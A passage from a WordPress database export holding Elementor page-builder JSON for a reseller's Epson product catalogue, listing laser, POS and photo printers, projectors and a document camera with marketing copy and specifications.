id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/h4><p><br \\/><br \\/>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"48\",\"right\":\"48\",\"bottom\":\"48\",\"left\":\"48\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T88V-i\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T70II\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7839,3463,'_elementor_version','2.5.14'),(8668,3665,'_wp_attachment_image_alt','Dell'),(7842,3464,'_wp_page_template','template-fullwidth.php'),(7843,3464,'_elementor_edit_mode','builder'),(7844,3464,'_elementor_template_type','post'),(7845,3464,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, 